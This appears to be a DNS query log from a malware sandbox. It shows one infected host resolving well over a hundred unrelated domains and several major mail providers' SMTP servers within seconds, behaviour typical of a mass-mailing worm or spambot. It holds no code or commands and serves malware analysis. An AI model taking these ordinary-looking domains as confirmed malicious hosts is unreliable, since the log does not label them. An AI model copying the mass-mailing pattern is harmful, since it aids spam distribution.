                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:10.103456974 CEST192.168.2.38.8.8.80xb145Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:11.319314003 CEST192.168.2.38.8.8.80x1ee4Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:11.648365021 CEST192.168.2.38.8.8.80x4838Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.012698889 CEST192.168.2.38.8.8.80x99aStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.955061913 CEST192.168.2.38.8.8.80xe561Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.997999907 CEST192.168.2.38.8.8.80xa3f2Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.070743084 CEST192.168.2.38.8.8.80x374bStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.345467091 CEST192.168.2.38.8.8.80xa84cStandard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.683128119 CEST192.168.2.38.8.8.80xe99Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.801218987 CEST192.168.2.38.8.8.80xe440Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.802443027 CEST192.168.2.38.8.8.80x542eStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.302018881 CEST192.168.2.38.8.8.80x5ffaStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.518616915 CEST192.168.2.38.8.8.80xd947Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.532334089 CEST192.168.2.38.8.8.80xe736Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.770517111 CEST192.168.2.38.8.8.80xd577Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.831645966 CEST192.168.2.38.8.8.80x3420Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:17.088133097 CEST192.168.2.38.8.8.80xb893Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:18.333393097 CEST192.168.2.38.8.8.80x33d0Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:18.841242075 CEST192.168.2.38.8.8.80xf6c3Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:19.713373899 CEST192.168.2.38.8.8.80x2098Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.259859085 CEST192.168.2.38.8.8.80x8589Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.570816040 CEST192.168.2.38.8.8.80xdb1aStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.573874950 CEST192.168.2.38.8.8.80xb89aStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.575571060 CEST192.168.2.38.8.8.80xf4afStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.576836109 CEST192.168.2.38.8.8.80x186aStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:22.275948048 CEST192.168.2.38.8.8.80xfc68Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:23.374176025 CEST192.168.2.38.8.8.80x4811Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.756079912 CEST192.168.2.38.8.8.80x9b35Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.756176949 CEST192.168.2.38.8.8.80xf057Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.757137060 CEST192.168.2.38.8.8.80x8e03Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.781517982 CEST192.168.2.38.8.8.80xed74Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.790605068 CEST192.168.2.38.8.8.80x8047Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.802618027 CEST192.168.2.38.8.8.80x2c11Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.805416107 CEST192.168.2.38.8.8.80x982Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.815429926 CEST192.168.2.38.8.8.80xc664Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.850752115 CEST192.168.2.38.8.8.80x563eStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.939698935 CEST192.168.2.38.8.8.80x1086Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.999564886 CEST192.168.2.38.8.8.80x450cStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.011919975 CEST192.168.2.38.8.8.80xf4b8Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.116653919 CEST192.168.2.38.8.8.80x8386Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.150644064 CEST192.168.2.38.8.8.80xfad3Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.150644064 CEST192.168.2.38.8.8.80x67d1Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.177669048 CEST192.168.2.38.8.8.80x328fStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.178648949 CEST192.168.2.38.8.8.80x7e4fStandard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.179410934 CEST192.168.2.38.8.8.80xfc5Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.196829081 CEST192.168.2.38.8.8.80xbef1Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.205312014 CEST192.168.2.38.8.8.80x1b2bStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.216418028 CEST192.168.2.38.8.8.80x9b45Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.241858006 CEST192.168.2.38.8.8.80x8841Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.266436100 CEST192.168.2.38.8.8.80xede6Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.285276890 CEST192.168.2.38.8.8.80x4284Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.286645889 CEST192.168.2.38.8.8.80x6b5aStandard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.311945915 CEST192.168.2.38.8.8.80x4305Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.316699028 CEST192.168.2.38.8.8.80x5478Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.318561077 CEST192.168.2.38.8.8.80x7307Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.319480896 CEST192.168.2.38.8.8.80x9cbfStandard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.319904089 CEST192.168.2.38.8.8.80xe009Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.341325045 CEST192.168.2.38.8.8.80x63dStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.375837088 CEST192.168.2.38.8.8.80x7b17Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.413311005 CEST192.168.2.38.8.8.80xbc16Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.415849924 CEST192.168.2.38.8.8.80x101fStandard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.418874979 CEST192.168.2.38.8.8.80x9bf1Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.424103022 CEST192.168.2.38.8.8.80x118fStandard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.527273893 CEST192.168.2.38.8.8.80x7263Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.538958073 CEST192.168.2.38.8.8.80x3851Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.548217058 CEST192.168.2.38.8.8.80x6236Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.599581957 CEST192.168.2.38.8.8.80x3e6eStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.699246883 CEST192.168.2.38.8.8.80xf0beStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.725614071 CEST192.168.2.38.8.8.80xd235Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.734227896 CEST192.168.2.38.8.8.80x114aStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.819809914 CEST192.168.2.38.8.8.80x1b4dStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.824697971 CEST192.168.2.38.8.8.80xf4f4Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.928524971 CEST192.168.2.38.8.8.80x78e9Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.930720091 CEST192.168.2.38.8.8.80xeddbStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.947767019 CEST192.168.2.38.8.8.80xd03aStandard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.976372957 CEST192.168.2.38.8.8.80xe442Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.977719069 CEST192.168.2.38.8.8.80xd7b7Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.979441881 CEST192.168.2.38.8.8.80x60f4Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.083201885 CEST192.168.2.38.8.8.80xe9f7Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.129470110 CEST192.168.2.38.8.8.80x8802Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.193435907 CEST192.168.2.38.8.8.80x7ecfStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.310841084 CEST192.168.2.38.8.8.80x6a44Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.400408983 CEST192.168.2.38.8.8.80x324dStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.480649948 CEST192.168.2.38.8.8.80x9bf1Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.496833086 CEST192.168.2.38.8.8.80xfd3Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.496959925 CEST192.168.2.38.8.8.80x3a79Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.497394085 CEST192.168.2.38.8.8.80xcf4aStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.508431911 CEST192.168.2.38.8.8.80x4ad2Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.517630100 CEST192.168.2.38.8.8.80x6dd2Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.527579069 CEST192.168.2.38.8.8.80xff78Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.535273075 CEST192.168.2.38.8.8.80x5273Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.538507938 CEST192.168.2.38.8.8.80xd07Standard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.542911053 CEST192.168.2.38.8.8.80xfabcStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.549170017 CEST192.168.2.38.8.8.80xa8dfStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.562237978 CEST192.168.2.38.8.8.80xa0e7Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.612230062 CEST192.168.2.38.8.8.80x46a9Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.830899954 CEST192.168.2.38.8.8.80xa1b6Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.016727924 CEST192.168.2.38.8.8.80xf6aaStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.061681032 CEST192.168.2.38.8.8.80x8d68Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.108967066 CEST192.168.2.38.8.8.80x1d8eStandard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.150806904 CEST192.168.2.38.8.8.80x2f1Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.196590900 CEST192.168.2.38.8.8.80x50c2Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.208959103 CEST192.168.2.38.8.8.80xe799Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.235755920 CEST192.168.2.38.8.8.80xfaa2Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.236115932 CEST192.168.2.38.8.8.80xfc4fStandard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.256931067 CEST192.168.2.38.8.8.80x5c65Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.261153936 CEST192.168.2.38.8.8.80x1b67Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.261862993 CEST192.168.2.38.8.8.80x4289Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.274576902 CEST192.168.2.38.8.8.80xe830Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.276324034 CEST192.168.2.38.8.8.80x1397Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.286505938 CEST192.168.2.38.8.8.80x7f3dStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.297171116 CEST192.168.2.38.8.8.80x1ea1Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.299835920 CEST192.168.2.38.8.8.80x26b3Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.320475101 CEST192.168.2.38.8.8.80xb4f4Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.326220989 CEST192.168.2.38.8.8.80xe054Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.337364912 CEST192.168.2.38.8.8.80xa0a0Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.433541059 CEST192.168.2.38.8.8.80x7329Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.434667110 CEST192.168.2.38.8.8.80xe966Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.543912888 CEST192.168.2.38.8.8.80x9bf1Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.558521986 CEST192.168.2.38.8.8.80xe7bfStandard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.652878046 CEST192.168.2.38.8.8.80xa14fStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.679466963 CEST192.168.2.38.8.8.80x53cdStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.781558990 CEST192.168.2.38.8.8.80xe27fStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.792823076 CEST192.168.2.38.8.8.80x579Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.805910110 CEST192.168.2.38.8.8.80x4a09Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.822920084 CEST192.168.2.38.8.8.80x82a3Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.824812889 CEST192.168.2.38.8.8.80xed09Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.841356993 CEST192.168.2.38.8.8.80x4833Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.844814062 CEST192.168.2.38.8.8.80x27d5Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.856741905 CEST192.168.2.38.8.8.80x9055Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.863703966 CEST192.168.2.38.8.8.80x9e8cStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.864283085 CEST192.168.2.38.8.8.80x77beStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.868325949 CEST192.168.2.38.8.8.80x39bcStandard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.868794918 CEST192.168.2.38.8.8.80x4f3fStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.881969929 CEST192.168.2.38.8.8.80x9f27Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.884088993 CEST192.168.2.38.8.8.80x6bdcStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.894584894 CEST192.168.2.38.8.8.80x37c1Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.915656090 CEST192.168.2.38.8.8.80x5826Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.941828966 CEST192.168.2.38.8.8.80x672eStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.951020002 CEST192.168.2.38.8.8.80xd2aStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.963330030 CEST192.168.2.38.8.8.80x951aStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.965010881 CEST192.168.2.38.8.8.80x6c1aStandard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.966886997 CEST192.168.2.38.8.8.80x352bStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.979604959 CEST192.168.2.38.8.8.80xe5d0Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.985606909 CEST192.168.2.38.8.8.80x42eaStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.988523960 CEST192.168.2.38.8.8.80xefa7Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.003285885 CEST192.168.2.38.8.8.80xd370Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.004324913 CEST192.168.2.38.8.8.80xedb1Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.011766911 CEST192.168.2.38.8.8.80x3db0Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.012228966 CEST192.168.2.38.8.8.80x33b2Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.012537956 CEST192.168.2.38.8.8.80xb4e6Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.023916960 CEST192.168.2.38.8.8.80x15d5Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.032433033 CEST192.168.2.38.8.8.80xd022Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.038662910 CEST192.168.2.38.8.8.80xac01Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.089011908 CEST192.168.2.38.8.8.80xd37cStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.120415926 CEST192.168.2.38.8.8.80xdb7fStandard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.135155916 CEST192.168.2.38.8.8.80x799Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.138452053 CEST192.168.2.38.8.8.80xc2fcStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.138452053 CEST192.168.2.38.8.8.80xe614Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.156809092 CEST192.168.2.38.8.8.80x5049Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.262895107 CEST192.168.2.38.8.8.80x31f6Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.338167906 CEST192.168.2.38.8.8.80x3621Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.390944004 CEST192.168.2.38.8.8.80x5b36Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.450862885 CEST192.168.2.38.8.8.80xe61eStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.468632936 CEST192.168.2.38.8.8.80xccd9Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.482971907 CEST192.168.2.38.8.8.80x9039Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.491511106 CEST192.168.2.38.8.8.80x5c0cStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.523791075 CEST192.168.2.38.8.8.80x5676Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.607827902 CEST192.168.2.38.8.8.80xe99dStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.616974115 CEST192.168.2.38.8.8.80xbd22Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.619941950 CEST192.168.2.38.8.8.80x1bb9Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.624099970 CEST192.168.2.38.8.8.80x88a3Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.660554886 CEST192.168.2.38.8.8.80x1ea3Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.699618101 CEST192.168.2.38.8.8.80xaaecStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
